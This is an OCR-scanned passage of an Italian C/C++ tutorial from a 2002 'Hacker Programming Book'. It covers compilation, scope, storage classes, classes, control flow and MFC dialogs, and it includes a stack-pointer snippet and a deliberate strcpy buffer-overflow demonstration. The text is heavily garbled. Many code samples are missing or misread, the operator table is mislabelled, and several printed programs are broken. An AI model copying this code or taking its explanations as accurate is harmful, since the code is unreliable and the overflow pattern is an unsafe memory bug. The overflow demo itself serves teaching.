ambiti, il linguaggio C dà la possibilità di inserirle, una volta compilate, dentro a delle librerie e 

quindi poi di poterle riutilizzare senza doverle riscrivere tutte le volte. 

Il compilatore C viene fornito di un numero elevatissimo di funzioni di libreria indrizzate a 
svolgere i compiti più diversi. 

Richiedete l'help del compilatore e vedrete che, al fine di dargli un ordine, le funzoni sono 
state raggruppate per tipo. 

Ad esempio quelle che gestiscono le stringhe, quelle relative a funzioni matematiche, quelle 
utilizzate per l'input/output ecc. 

Per potervi dimenticare in mezzo al grosso numero tenete sempre ben presente quello che 
volete fare e cercate nel gruppo idoneo. 

Ad esempio se possedete un numero float, 5.89 ad esempio, e lo volete trasformare in un 
valore stringa, "5.89", andate a vedere nell'ambito delle funzioni di conversione e troverete la 
funzione che fa per voi, ftoa() in questo caso. 

Prima di proseguire è necessario avere ben presente il processo eseguito da compilatore e 
dal link. 
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Quando scriviamo un programma in Linguaggio C utilizziamo dei riferimenti simbolici per 
manipolare le variabili e per richiamare le funzioni. 

In altre parole le variabili, pur essendo memorizzate a certi indirizzi di memoria, possiedono 
un nome che noi utilizzeremo per la manipolazione del loro valore. 
Ad esempio faremo : 

a = 25; 

Sapendo che in effetti la variabile a è memorizzata all'indirizzo 00405678, ad esempio, 
potremmo identificare in assembler l'istruzione di assegnazione con : 



Lo stesso dicasi per il richiamo di funzioni. 

Noi utilizziamo per rischiarle il nome che gli abbiamo assegnato in fase di scrittura del 
programma. 

funzione(23) 

Anche questa funzione possiede al prima istruzione del codice a lei interna ad un certo 
indirizzo. 

In asembler, supponendo che l'indirizzo della funzione sia 00405678, avremmo : 
cali 00405678 

Il compilatore esegue un analisi sintattica e semantica per vedere se il programma è stato 
scritto correttamente e poi crea per ogni file .C un file .OBJ. 
Questo file .OBJ contiene ancora riferimenti simbolici. 

Il linker eseguirà l'ultima fase della creazione del programma ovvero quella in cui i vari files 
.OBJ vengono presi e i loro riferimenti interni tradotti i riferimenti assoluti. 
Dopo averli uniti viene creato il file eseguibile :EXE. 

Al fine di strutturare in modo più ordinato un programma è possibile scrivere il codice in più 
files .C, ovvero file sorgente. 

Dopo averli creati è possibile compilarli ed linkarli insieme alla fine. 

I moduli .OBJ possono anche essere inseriti all'interno di librerie le quali possono essere 
unite in fase di link al programma. 

Pensando all'esecuzione di un programma viene da chiedersi una cosa. 
Da dove inizia l'esecuzione di un programma ? 

I programmi scritti in C per convenzione iniziano l'esecuzione da quella che viene definita con 
il termine di main function. 

In pratica in un programma esisterà una funzione che si chiama : 
main() 

Nel caso di Windows la funzione principale si chiama WinMain(). 

In altre parole il punto costituito dalla funzione main() o WinMain() verrà utilizzata come entry 
point. 

Riprendiamo l'esempio di cui abbiamo parlato relativo alle funzioni per la manipolazione delle 
stringhe ovvero : 

strcpyO, strcat(), strcmp() 

Queste sono inserite dentro ad una libreria distribuita con tutti I compilatori C. 

Nei nostri programmi utilizzeremo le funzioni ma non riscriveremo il codice in quanto queste 

verranno estratte dalle librerie ed inserite dentro al nostro programma dal link. 

Nel linguaggio C esiste un problema dato dal compilatore e dal come questo analizza il 

sorgente. 

In pratica l'analisi avviene dall'inizio del file per cui si verifica un problema. 

In altre parole il compilatore potrebbe incontrare il richiamo di una funzione presente in una 

libreria o scritta solo successivamente all'interno del programma. 
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Il compilatore quando incontra un richiamo dovrebbe sapere quali sono le caratteristiche delle 
funzione ovvero quali parametri accetta e quali valori ritorna. 

Per fere questo, se non è possibile scrivere la funzione prima di richiamarla, è sufficiente 
creare un prototipo che altro non è che la testata delle funzione in cui è possibile vedere tutte 
le caratteristiche della funzione stessa. 
Ad esempio si potrebbe scrivere : 



int 


somma (int vi, int v2) ; 


int 


main (void) 


{ 






int c ; 




c = somma (22, 89) ; 




printf (« %d », c) ; 


} 




int 


somma (int vi, int v2) 


{ 






return vi + v2 ; 



I questo modo quando il compilatore incontrerà il richiamo alla funzione somma saprà già le 
caratteristiche di questa. 

Se la funzione fosse scritta prima del suo richiamo, il prototipo non sarebbe necessario in 
quanto questa direbbe al compilatore quali sono le sue caratteristiche. 
Se non mettete il prototipo il compilatore vi avvertirà che considererà la funzione come se 
ritornasse un intero. 

Questo andrebbe bene nel caso in cui la funzione non restituisse nulla o se il valore reso 

fosse davvero un intero, ma creerebbe dei problemi in caso contrario. 

I prototipi delle funzioni sono necessari anche per le funzioni di libreria ed è di fatto per 

questo motivo che insieme alle librerie vengono forniti dei files di include con estensione .H 

Dentro ai files . H sono dichiarate delle costanti usate dai programmi, i prototipi delle funzioni 

relative alle loro librerie e certe variabili. 

Anche i questo caso i files d'include raggruppano i dati per tipo. 

Ad esempio il file stdio.h contiene le dichiarazioni relative allo standard dinput/output. 

Questi devono essere importati nel sorgente grazie ad una specifica al preprocessore 

chiamata : 



Ad esempio le funzioni di elaborazione delle stringhe sono contenute dentro al file string.h il 
quale deve essere incluso con : 



Il compilatore possiede delle directory di default dove sono inseriti i files di libreria ed un'altra 
directory dove sono presenti i files d'include. 

Il fatto di specificare il nome del file tra < e > sarebbe come dire di cercarlo dentro alla 
directory di default degli include files. 
Specificando invece con : 

#include "stdio.h" 

dice di cercare il file dentro alla directory corrente del progetto. 

Ho definito come istruzione per il precompilatore in quanto tutte le istruzioni precedute da # 
sono specifiche che indirizzano il metodo di compilazione. 

Ce ne sono altre come ad esempio per creare blocchi condizionali che vengono inseriti e 
compilati solo a seguito di certe valutazioni. 

Una di queste, fondamentale, è quella che permette di definire delle costanti ovvero il 
costrutto : 
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#define 

Ad esempio è possibile fare : 



Attenzione che le costanti vengono prese nella fase di precompilazione, ovvero una fase 

prima della compilazione vera e propria, e vengono sostituite con i valori associati. 

In pratica quando il compilatore troverà la specifica PGRECO la sostituirà brutalmente con 

3.142. 

E' anche possibile specificare forme più complesse come ad esempio : 



Ricordatevi che le #define vengono sostituite. 

In ogni caso tralasceremo per questioni di spazio nell'ambito di questo volumetto. 

Ora che abbiamo parlato di funzioni è stato definito un certo numero di zone dove possono 

avvenire certe cose. 

Che cosa significa ? 

Semplicemente che prima non potevamo parlare di punti in cui avvengono le dichiarazioni ora 

invece possiamo riferirci a variabili definite fuori dalle funzioni e dentro. 

Una variabile possiede due caratteristiche particolari che sono la visibilità e il ciclo di vita. 

La prima caratteristica stabilisce dove questa variabile può essere vista. 

Se la variabile è dichiarata fuori delle funzioni la sua visibilità è globale ovvero tutte le funzioni 

del programma la possono vedere e quindi questa può essere utilizzata in qualsiasi punto. 

Per ora non parliamo ancora di moduli creati da files .c differenti. 

Il ciclo di vita è invece quella caratteristica che ci dice per quanto tempo la variabile esisterà. 
Se dichiarata al di fuori delle funzioni la sua vita sarà per tutta la durata del programma 
mentre se questa viene dichiarata dentro ad una funzione questa esisterà solo per il tempo di 
durata della funzione. 

Volendo dare un occhiata più a fondo dovremo vedere l'allocazione dal punto di vista dei 
segmenti. 

In pratica le dichiarazioni di variabili globali avvengono dentro al DATA SEGMENT mentre 

quelle dentro alle funzioni sono allocate dentro allo STACK SEGMENT. 

Fate attenzione che il compilatore dimensiona lo stack ad una certa dimensione di default in 

genere 4096 BYTES per cui sapendo che le dichiarazioni delle variabili dentro alle funzioni 

occupa lo spazio dentro allo stack segment, il loro dimensionamento troppo grosso potrebbe 

creare problemi di STACK OVERFLOW (avete mai visto questo messaggio ?). 

In altre parole se lo stack è di 4096 BYTES una cosa del tipo : 

int funzione() 
{ 

char a[9000]; 



creerebbe uno stack overflow. 

La specifica statica relativa alla classe di memoria farebbe si che la variabile non verrebbe più 
allocata nello stack ma in una zona di memoria appunto statica. 
La dichiarazione si trasformerebbe in : 



int funzione() 




Fate attenzione che le variabili locali dentro allo stack perdono il loro contenuto ogni volta che 
il programma esce dalla funzione per cui anche se da questa passerete più volte durante 
l'esecuzione, dovrete assegnare il valore ogni volta. 
Se la variabile è definita come statica invece manterrà il valore. 
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All'interno di una mail list all'annuncio di quello che sarebbe stato il contenuto di questo 
volume mi è stato chiesto cosa centrava la programmazione con quello che è relativo ai 
processi eseguiti dagli hackers. 

A parte il fatto che utilizzare dei programmi trovati in rete riduce l'hacker al rango di script 
kiddie, il discorso è che comunque l'hacker deve essere sempre in grado di risolvere dei 
piccoli problemi mediante la scrittura di piccole Utilities che permettano di eseguire 
determinate cose. 

Precedentemente abbiamo parlato, solo accennando l'argomento, di quelli che sono i 
buffers overflow visti dalla parte del programmatore una cosa che è necessario avere ben 
presente è legata alla gestione dei segmenti di cui abbiamo appena parlato nell'ambito 
dell'esempio precedente. 

A questo punto, dopo aver visto che le variabili locali vengono allocate dentro allo stack, è 
possibile aggiungere qualche cosa al discorso dei buffers overflow. 

Per riuscire ad individuare il punto dove si trova un buffer è necessario prima conoscere il 
punto d'inizio dello stack. 

Abbiamo visto quello che è il ritorno di un valore da parte di una funzione C ma di fatto non 
conosciamo il meccanismo che utilizza l'assembler. 

In genere una funzione che vuole restituire un valore lo fa utilizzando il registro eax. 

Ora se volessimo sapere l'indirizzo dello stack pointer, uno dei registri del processore e 

precisamente ESP, potremmo o scrivere un programma in assembler o possiamo utilizzare la 

specifica ASM che permette all'interno del linguaggio C di scrivere delle righe di 

programma direttamente in questo linguaggio. 

I casi sono due: o muoviamo il valore di esp dentro ad una variabile e poi usiamo l'istruzione 
return oppure muoviamo direttamente il valore di questo registro dentro a EAX. 

II programmino che stampa il valore del puntatore allo stack è il seguente : 



^include <std±o.h> 

unsigned long get_sp() 
{ 

unsigned long stp; 

asm 

{ 

mov eax, esp 

} 

} 

void main(void) 
{ 



printf("\nOx%x", get_sp()); 




Il discorso dei buffers overflow è vario ma nella forma più semplice avviene quando in un 

buffer di certe dimensioni viene inserita una sequenza di bytes molto maggiore. 

Nella migliore delle ipotesi questo procedimento creerà dei problemi di esecuzione anche se 

in forme più sofisticate è possibile mandare in esecuzione dei programmi, un po come 

nell'esempio in cui si faceva eseguire un array di numeri. 

Un programmino che dà l'idea del buffer overflow è quello che segue: 

void main(void) 
{ 

char stringa_lunga[1 00]; 
char stringa_corta[50]; 
memset(stringa_lunga, 0x41, 100); 
stringa_lunga[99] = 0; 
strcpy(stringa_corta, stringajunga); 
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Ritorniamo ora al discorso delle variabili e vediamo quando vengono utilizzate variabili locali e 

quando quelle globali. 

Questo è vostro compito valutarlo. 

In pratica se una variabile ha solo scopo nell'ambito di una funzione allora dichiaratela 
all'interno di questa. 

Se la variabile deve essere vista da qualsiasi funzione o almeno da più di una funzione allora 
dichiaratela globalmente. 

Una variabile possiede oltre all'identificatore ed a un tipo anche una classe di 
memorizzazione. 

Le variabili, se non dichiarate altrimenti, vengono considerate come automatiche e valgono 
per queste le regole appena viste. 

Un ulteriore classe di memorizzazione e' costituita da quelle definite come statiche per le 

quali viene allocata una memoria privata nella funzione in cui viene dichiarata. 

Mentre una variabile auto perde il valore all'uscita dalla funzione, la variabile statica lo 

mantiene Inalterato. 

Un esempio di dichiarazione 

static char alpha; 

Nel caso in cui si faccia un ampio uso di una variabile automatica esiste la classe di 
memorizzazione definita register. 

Questa classe non accetta tutti i tipi ma solo i char, gli int e i puntatori che vedremo a suo 
tempo. 

Una dichiarazione di questo tipo fa si che l'allocazione avvenga in un registro, ottenendo in 
questo modo un codice estremamente veloce e compatto. 

Per le variabili register esiste la possibilità' di richiedere l'allocazione per sole due variabili 
per ogni funzione. 

Richiedere non significa in ogni caso ottenere. 

Nel caso che non sia possibile ottenere questa classe di memorizzazione la variabile 
viene trasformata in una semplice variabile automatica. 

Fate attenzione che comunque la classe register appartiene alle variabili automatiche. 
Esempio 



L'ultima classe di memorizzazione e' costituita dalle variabili dichiarate come extern. 

Una variabile dichiarata internamente ad una funzione, come abbiamo visto 

precedentemente, viene considerata locale. 

E' possibile renderla visibile all'esterno della stessa mediante una dichiarazione extern, 
extern char pippo[]; 

A questo punto che abbiamo visto quello che sono le variabili e il significato delle funzioni 
possiamo includere nei nostri discorsi il punto chiave della programmazione Object Oriented 
ovvero quello relativo alla creazione delle CLASSI. 

Volendo fare un discorso metaforico potremmo dire che qualsiasi cosa del nostro mondo può 
essere vista come un oggetto che a sua volta è composto da altri oggetti ciascuno dei quali 
possiede determinate caratteristiche e modi di funzionamento. 

Avevamo detto prima che volevamo ricordarci a cosa si riferivano determinati dati potevamo 
utilizzare il concetto di struttura per incapsulare tutte le variabili relative ad un determinato 
oggetto. 

Nel Linguaggio C++ il concetto di classe è un ampliamento di quello di struttura ovvero un 
contenitore idoneo a contenere sia i dati che i metodi di funzionamento relativi a un qualche 
cosa. 

Non ho usato il termine oggetto in quanto verrebbe se no da pensare che quelli definiti con il 
termine di oggetti siano di fatto le classi del C++. 

Ritornando al discorso dell'analisi possiamo dire che ogni problema o che ogni componente 
del mondo reale può essere scomposto in un certo numero di sottocomponenti. 
Anche nell'ambito della programmazione ci ritroviamo a poter utilizzare i concetti di struttura e 
di classe per descrivere questi componenti. 
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Facciamo un esempio pratico. 

Supponiamo di dover creare un insieme di oggetti idonei a ricevere in input dei dati da 
tastiera ed a stampare delle stringhe statiche. 

Analizzando tutti e due i componenti ci accorgiamo che questi sono disegnati a video e qui 
rappresentati da dei rettangoli. 

Questi rettangoli servono a visualizzare le dimensioni di tali oggetti nell'ambito dell'interfaccia 
utente. 

Quindi indipendentemente dal fatto che poi dentro a questi rettangoli si scriva o si leggano i 

tasti digitati, i metodi per il disegno dei bordo sarà comune. 

Ora prendiamo in esame un sistema che gestisca il disegno di rettangoli a video. 

Come proprietà memorizzabili in variabili ci saranno quelle delle posizioni di x e y e della 

larghezza e altezza. 

A livello di metodi funzionali invece ci sarà una funzione che sfruttando questi dati esegue il 
disegno del rettangolo. 

Volendo incapsulare tutti gli appartenenti a questo blocco potremmo usare la definizione di 
classe con : 

class rectangle { 
intx, y; 

int width, height ; 

}; 

Volendo inserire anche il metodo di disegno la classe si tramuterebbe in : 

class rectangle { 
int x, y; 

int width, height ; 
void designRect(); 

}; 

Ora la classe rettangolo può essere usata per creare un oggetto rettangolo il quale possiede 
tutto quello che gli necessita per il suo ciclo vitale e funzionale, semplicemente dichiarando 
delle variabili con questo tipo. 
Potremmo quindi fare : 



Quindi potremo prima assegnare le variabili con : 
recti .x = 23; 



E' inutile dire che sicuramente la funzione designRect() utilizzerà i suoi dati interni alla classe 
per l'esecuzione del disegno del rettangolo. 

Ora se dovessimo continuare la creazione degli oggetti di cui avevamo parlato potremmo fare 
una cosa. 

Una delle caratteristiche della programmazione object oriented è legata al concetto di 
ereditarietà. 

In pratica creando altre classi si potrebbe usare questa appena definita per fare nascere la 
nuova classe. 

Sicuramente sia la classe d'input che quella per la gestione della stringa statica a video dovrà 
utilizzare una funzione per disegnare il rettangolo che delimita il bordo del campo. 
Invece di scrivere internamente tale funzione potremo creare la nuova classe in modo che 
erediti tale funzionalità dalla classe rectangle. 

class editField : public rectangle 
{ 

char valore[256]; 
void leggiValore(); 
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Allo stesso modo potremo definire la classe : 

class staticField : public rectangle 
{ 

char stringa[256]; 
staticField(char *value); 
void printValue(); 

}; 

Ereditando dalla classe rectangle la fnzione per il disegno del bordo si potrà fare : 
editField fieldl ; 
fieldl.x = 23; 
field.designRect(); 

In questo caso ho usato la funzione ereditata per farvi vedere che ereditandola la si può 
utilizzare ma sicuramente questa verrebbe usata da qualche funzione interna alla classe che 
disegnerà il bordo al momento della creazione dell'oggetto editField. 

Questo è un esempio molto generico in quanto poi vedremo che dentro alle classi esistono 
degli attributi che permetterebbero di definire come privati certi membri, pubblici altri ecc. 
Quello che mi interessava era quello di far capire come è possibile sfruttare il concetto di 
ereditarietà ovvero quando un classe creata a partire da un'altra eredita tutte le funzioni 
incluse in questa o in quelle da cui a sua volta quesf ultima classe deriva. 
Nella teoria delle classi esistono due concetti particolari ovvero quelli del costruttore e quello 
del distruttore. 

In pratica questi due sono due metodi che vengono richiamati, se implementati nella classe, 
all'atto della creazione della classe e all'atto della sua distruzione ovvero nell'istante in cui 
viene richiesta la disallocazione. 

Avevamo visto prima che grazie al concetto di puntatore era possibile utilizzare l'allocazione 
dinamica ovvero quel tipo in cui si richiede al sistema, tramite una funzione, di allocare una 
certa quantità di memoria e quindi di assegnare l'indirizzo di partenza al puntatore di 
destinazione. 

La programmazione Object Oriented include un nuovo operatore che permette di creare 
dinamicamente degli oggetti. 
Stiamo parlando dell'operatore new. 

Invece di richiedere l'allocazione statica di una classe, ad esempio con : 



Potremmo fare : 

className *varName = new className; 

Il sistema richiederebbe al sistema operativo di allocare da qualche parte della memoria di 
grandezza sufficiente e assegnerebbe l'indirizzo al puntatore. 

All'atto della creazione, se gestito all'interno della classe, verrebbe richiamato il costruttore 
della classe che a livello di dichiarazione in genere è come un metodo che possiede lo stesso 
nome della classe. 
Ad esempio : 

class className { 
className(); 
~className(); 

}; 
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classNameO è il metodo costruttore, che come abbiamo apena detto verrebbe richiamato in 
fase di creazione della classe. 

Il secondo metodo invece, quello preceduto da ~ è il distruttore ovvero il metodo richiamato in 

fase di distruzione della classe. 

La creazione dinamicamente si ottiene con new. 

La distruzione di una classe avviene quando non ha più scopo oppure quando viene richiesta 
la distruzione tramite l'operatore delete. 

tfinclude <iostream> 
using namespace std; 



class Box 
{ 

public: 

doublé length; 
doublé breadth; 
doublé height; 



// Class definition at global scope 



// Length of a box in inches 
// Breadth of a box in inches 
// Height of a box in inches 



// Constructor definition 

Box (doublé lv, doublé bv, doublé hv) 

{ 

cout « endl « "Constructor called. "; 
length = lv; // Set values of 

breadth = bv; // data members 

height = hv; 

; 

// Function to calculate the volume of a box 

doublé Volume () 

{ 

return length * breadth * height; 

} 



int main (void) 
{ 

Box Boxi (78. 0,24.0, 18.0) ; 
Box CigarBox (8.0,5.0,1.0); 
doublé volume = 0.0; 
volume = Boxi . Volume () ; 



// Declare and initialize Boxi 
// Declare and initialize CigarBox 
// Store the volume of a box here 
// Calculate volume of Boxi 



cout « endl 

« "Volume of Boxi = " « volume; 
cout « endl 

« "Volume of CigarBox = " 

« Ci garBox . Voi urne () ; 
cout « endl; 



return 0; 



Parlavamo prima dicendo che con il compilatore C vengono distribuite delle librerie contenenti 

un numero molto elevato di funzioni destinate allo svolgimento dei compiti più diversi. 

La distribuzione di Windows ha portato a implementare con il compilatore un'altra serie 

enorme di librerie di funzioni ciascuna delle quali è destinata al controllo di Windows stesso, 

come ad esempio il controllo delle finestre, delle dialog, dei campi di edit ecc. 

L'avvento del C++ ha portato alla creazione di classi che incapsulano tutte queste API 

all'interno di quelle che sono state chiamate con il nome di Microsoft Foundation Class 

(MFC). 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



Scrivendo un programma in C normale potremo, al fine di gestire le varie caratteristiche del 
programma utilizzare la API oppure, usando il C++ implementeremo il tutto sfruttando le 
classi MFC. 

Chiaramente il concetto di classe ha permesso di implementare tutte le funzioni a partire da 
dei semplici oggetti di base. 

Andando a vedere la carta gerarchica delle classi incluse dentro a MFC ci accorgeremmo che 
tutte derivano dalla classe CObjetc. 

Il pericolo di usare il C++ venendo dal C potrebbe essere quello che avevo fatto io ai tempi in 
cui avevo fatto il passaggio da uno all'altro, verso il 1987. 

Quando scrivete un programma con la metodologia object oriented cercate di identificare ogni 
singolo componente del programma osservandolo bene e cercando di definirlo con tutte le 
sue variabili e con tutti i suoi metodi necessari a farlo funzionare. 

Se l'oggetto lo avrete strutturato bene questo potrebbe essere preso e spostato in un altro 
ambito continuando a vivere tranquillamente e quindi funzionare. 

In pratica dicevo che quando nel 1987 ho comprato la prima versione di compilatore C++, lo 

Zortech, continuai a scrivere tranquillamente codice in C utilizzando le classi in alcuni punti 

ma senza che poiu alla fine il programma risultasse un'unica classe. 

In altre parole più che scrivere in C++ scrivevo programmi in C orientati al C++. 

Un giorno acquistai C++View che altro non era che una trasposizione dello Smaltalk verso il 

C++. 

Questo sistema di sviluppo non ti lasciava uscire dalle classi per cui diventava necessario 
andare a vedere i singoli componenti di base e mano mano permetteva di creare nuove classi 
ma sempre partendo da quelle già esistenti. 

Alla fine del tutto il programma era una classe che aveva ereditato gerarchicamente tutte le 
altre classi. 

Guardate la tabella di cui vi ho parlato, quella della struttura delle classi MFC, e capirete 
quello che voglio dire. 

D'altra parte, come abbiamo già detto, Windows costituisce l'ambiente idoneo 
all'incapsulamento di tutte le componenti sia che questi siano relativi alla gestione 
dell'interfaccia utente, che per quanto riguarda le gestioni delle basi di dati 
Fino ad ora abbiamo in parte parlato della strutturazione di un programma, chiaramente 
facendolo nei limiti offerti da un testo di questo tipo, tralasciando però le parole chiave 
utilizzate per il controllo del flusso dei programmi. 

Se non esistessero costrutti tali per applicare quelli che sono i concetti chiave di tutti i 
linguaggi quali ad esempio i controlli, i cicli interattivi ecc. un programma verrebbe 
considerato semplicemente come una sequenza lineare di istruzioni che verrebbero sempre 
eseguite allo stesso modo. 

I sistemi orientati ai controlli dei dati invece permettono di variare i flussi di esecuzione. 
La parola chiave fondamentale è quella che permette di creare il costrutto : 

if(condizione) { } [ else { } ] 

La parte tra parentesi quadre è opzionale. 

La condizione specificata all'interno delle parentesi rotonde utilizza gli operatori relazionali per 
verificare i valori all'interno di variabili o quelli restituiti da funzioni. 
Gli operatori relazionali sono : 



Operatore 


Nome 


i 


NOT o negazione 


+ 


Addizione 




Sottrazione 


* 


Moltiplicazione 


/ 


Divisione 


% 


Modulo 




Complemento ad uno 


« 


Shift a sinistra 


» 


Shift a destra 


< 


Minore di 




Maggiore di 
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<= 


Minore uguale di 


>= 


Maggiore uguale di 


— — 


Uguaglianza 


/ = 


Diverso 


s 


AND su bit, indirizzo di 


1 


OR su bit 


ss 


AND logico 


II 


OR logico 


++ 


Incremento 




Decremento 



Fate attenzione di una cosa. 

Per confrontare due variabili e vedere se queste sono uguali si deve utilizzare l'operatore 
relazionale 



che è diverso dall'operatore di assegnazione = 
Esistono controlli ridondanti del tipo : 



Questo controllo starebbe a dire : SE A E' VERO 

Una variabile è sempre vera se contiene un valore diverso da 0. 

L'errore più comune di inizia con il C è quello di creare costrutti del tipo 



Invece di 
«(a ==5) ... 



Nel primo caso cosa capiterebbe ? 

In pratica prima di eseguire la valutazione di a avverrebbe l'assegnazione di a = 5. 
Essendo a = 5 la valutazione darebbe vero in quanto, come abbiamo detto, qualsiasi valore 
differente da 0 è VERO (TRUE). 

Mediante i congiuntivi e i disgiuntivi AND e OR si possono creare costrutti valutativi formati 

da più' valutazioni. 

In altre parole si potrebbe fare : 



Gli operatori sono : 




Attenzione che esistono anche gli operatori logici a livello di istruzioni matematiche logiche e 
precisamente l'operazione di AND logico e di OR logico che sono rappresentati da uno solo 
dei simboli di prima. 
In altre parole : 




Ad esempio è possibile fare : 



a = 14&2; 
b = b 1 16; 
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Comuqnue, tornando alla valutazione del if possiamo aggiungere che è possibile anche 
valutare I valori di ritorno di funzioni senza fare passaggi tramite assegnazioni. 
In pratica dovendo valutare il valore restituito da una funzione potremmo fare : 

int a = funzione(); 
if(a == 5).... 

Oppure direttamente : 

Il costrutto else sarebbe come dire 

lf(condizione_è_vera) { 
Istruzione 1 ; 



Istruzione n; 

} else { 

Istruzione 1 ; 




La parte racchiusa nell'else viene eseguita nel caso in cui la condizione risulti falsa. 
Nel caso in cui la conseguenza della valutazione fosse di una sola istruzione è possibile 
anche omettere le parentesi graffe che racchiudono le istruzioni. 
Ad esempio sono costrutti validi : 

if(a == 5) 

funzione1(); 

else 

funzione2(); 

Oppure : 

if(a == 67 && b == a) 
funzione(); 

Esistono casi in cui è necessario fare vautazioni multiple. 

In questo caso è possibile mettere consecutivamente più if oppure è possibile usare il 
costrutto 

switch(valore_da_controllare) { 
case xxx : 

break; 
case yyy: 

break; 

default: 

break; 



I vari case corrispondono ai valori mentre il default significa che se nessuno degli altri casi è 
stato valutato come vero, vengono eseguite le istruzioni interne al default. 

II break dice di interrompere l'esecuzione. 

Fate attenzione che se fosse omesso il break l'esecuzione continuerebbe anche con le 
istruzioni dopo anche se queste fossero parte di un altro case. 
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Ad esempio : 

^include <stdio.h> 

void mairi (void) 
{ 

int sei; 

puts("l .. Directory"); 

puts("2 .. Versione DOS") ; 

puts ("Scelta : "); 

sei = getch(); 

switch (sei) 

{ 

case 1 : 

system ( "dir" ) ; 

break; 
case 2: 

system ( "ver ") ; 

break; 
de fault : 



puts ("\n\nScelta errata") ; 

exit (0) ; 

break; 




Ora vediamo un altro costrutto che permette di creare dei cicli interattivi ovvero di delimitare 

delle istruzioni in modo che vengano eseguite un certo numero di volte. 

Il numero di volte verrà stabilito da valutazioni che verranno fatte dai costrutti. 

Il primo è il for() 

La sintassi è : 



Il for è composto da tre parti opzionali interne ovvero una parte relativa all'inizializzazione 
delle varibili usate per la ripetizione del ciclo, una parte legata al controllo e una dedicata 
all'operazione. 

Ad esempio se sapessimo a priori che un certo gruppo di istruzioni deve essere ripetuto un 
certo numero di volte potremmo fare : 

int indice; 

for(indice = 1 ; indice != 10;indice++) { .... } 

Il costrutto appena visto sarebbe come dire : 

per indice che parte da uno fino a quando indice è diverso da 10 incrementa indice di 
uno RIPETI 

In pratica le parti OPZIONALI (nessuna è necessaria) sono : 

ASSEGNAZIONE 

CONTROLLO 

OPERAZIONE 

Se volessimo eseguire all'infinito un certo numero di istruzioni potremmo anche fare : 

for(;;) { 

} 
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Il ciclo in questo caso verrebbe interrotto da qualche cosa interno al ciclo stesso, o da un 
return dalla funzione che include il for() oppure grazie ad un istruzione di BREAK che 
interrompe il for(). 

Fate attenzione che se sbagliate il controllo potreste anche non uscire più dal ciclo. 
Prendete l'esempio : 

for(indice = 1 ; indice != 3;indice+=4) { .... } 

In questo caso la prima volta indice varrebbe 1 ma il ciclo subito dopo, visto che l'incremento 
è di 4 verrebbe subito 5 per cui non sarebbe mai falsa la condizione FINCHE INDICE E' 
DIVERSO DA 3. 

Dicevamo che il for() è costituito da tre parti. 

Avremmo potuto eseguire il tutto con un'altra forma di interazione offerta dal C ovvero 

mediante il while. 

Questo ha la seguente sintassi : 

while(condizione) { 
} 

In pratica dice : ripeti fino a quando la condizione è vera. 
La valutazione della condizione segue la sintassi del IF. 

Ad esempio è possibile ripetere all'infinito, lasciando il compito di terminare il tutto qa qualche 
istruzione interna al while, mediante : 



while(1){ 




Questo vuole dire : 



RIPETI FINO A QUANDO 1 E' VERO 

Uno è sempre vero !!! 

Chiaramente con il while la valutazione avviene subito all'inizio per cui nessuno ci dice che 
quelle istruzioni dentro al while verrebbero eseguite almeno una volta. 
Se si vuole che queste almeno per la prima volta vengano eseguite, è possibile usare il 
costrutto : 



do{ 




In questo cas la valutazione avviene dopo la prima volta che le istruzioni interne vengono 
eseguite. 

Ricordatevi che molte funzioni restituiscono valori che possono essere usati per la 
valutazione degli if, while, do while, for. 

Prendete ad esempio la funzione che compara due stringhe, ovvero strcmp() 

Questa esegue la sottrazione della prima stringa passata cme argomento alla seconda per 

cui il valore restituito è : 

< 0 se la prima stringa è minore delle seconda 

0 se le due stringhe sono uguali 

>0 se la seconda stringa è minore della prima 



In questo caso sarebbe possibile fare : 
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Oppure : 

while(strcmp(a,b)) .... 



I n linea di massima i concetti di W indows 

Sotto DOS esistevano diverse funzioni che permettevano di eseguire l'input/output 
sull'interfaccia utente. 

Chiaramente queste funzionalità sono importantissime in quanto all'interno di un programma 
la maggior parte del codice è quasi sempre legato alla gestione dell'input da parte dell'utente 
ed in particolar modo al controllo d quanto digitato e successivamente, dopo l'elaborazione 
dei dati, al suo output sulle maschere video. 

La filosofia Object Oriented ha costituito un ambiente ottimale per creare tutti gli oggetti che 
possono permettere questa interazione con l'utente in ambiente Windows. 
Gran parte del lavoro viene svolto, fortunatamente, dai vari Wizard disponbili con i vari sistemi 
di sviluppo. 

Spesso la strutturazione dei programmi, in questo ambiente, è abbastanza complessa in 
particolar modo per quanto riguarda ad esempio il modello offerto dalle classi MFC distribuite 
con visual C++. 

Dicevamo che fortunatamente spesso dobbiamo solo limitarci a posizionare degli oggetti 
selezionati da menu o toolbar sopra le dialog create automaticamente dal sistema di sviluppo. 
Una volta posizionati questo oggetti, ci saranno delle variabili che li identificheranno e queste 
verranno usate per accedere ai vari metodi inclusi dentro alle classi da cui questi derivano, 
che ci permetteranno di manipolare i vari contenuti. 
Facciamo un esempio pratico utilizzando il Visual C++. 

Attiviamolo e richiediamo, mediante scelta da menu, di creare un nuovo progetto di tipo MFC 
dandogli come nome prova. 
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Proseguendo selezioniamo un progetto di tipo DIALOG BASED. 

Visual C++ gestisce tre tipi fondamentali di progetti ciascuno dei quali tratta in un certo modo 
l'interfaccia utente. 

Chiaramente per l'esempio ho scelto quello più semplice in quanto di fatto non è pretesa di 
questo testo essere una guida approfondita di programmazione in ambiente Windows. 
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Lasciamo gli altri parametri di default fino a quando Visual Studio creerà la dialog di lavoro a 
video. 




Windows è sempre stato, si dai primi tempi, EVENT BASED ovvero basato agli eventi o ai 
messaggi. 

In pratica il sistema intercetta qualsiasi evento identificando l'oggetto a cui è destinato. 
Chiaramente il codice scritto dall'utente può intercettare e trattare tale messaggio o ignorarlo. 
Prendiamo ad esempio un pulsante. 

Premendolo verrà generato un evento destinato a questo, intercettando il quale sarà 
possibile creare del codice in funzione di questo. 

L'implementazione delle classi MFC ha permesso di incapsulare anche i messaggi facendoli 
diventare una proprietà intercettabile degli oggetti stessi. 

La dialog di default viene creata con tre oggetti di default sopra ovvero un campo statico con 

un scritta e due pulsanti. 

Ora cancelliamo tutti questi tre oggetti da video. 

Supponiamo di voler creare un programma che inserendo due valori in due campi di edit, 
dopo aver premuto un pulsante, visualizzi il risultato in un terzo campo. 
Inseriamo tre campi di edit : 
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Ora dovremo identificare i tre campi in modo tale che sfruttando i vari metodi a disposizione 
per questi tipi di oggetti sia possibile leggere e settare i valori. 

Posizioniamoci sul primo e dopo aver premuto il tasto destro del mouse scegliamo il CLASS 
WIZARD. 

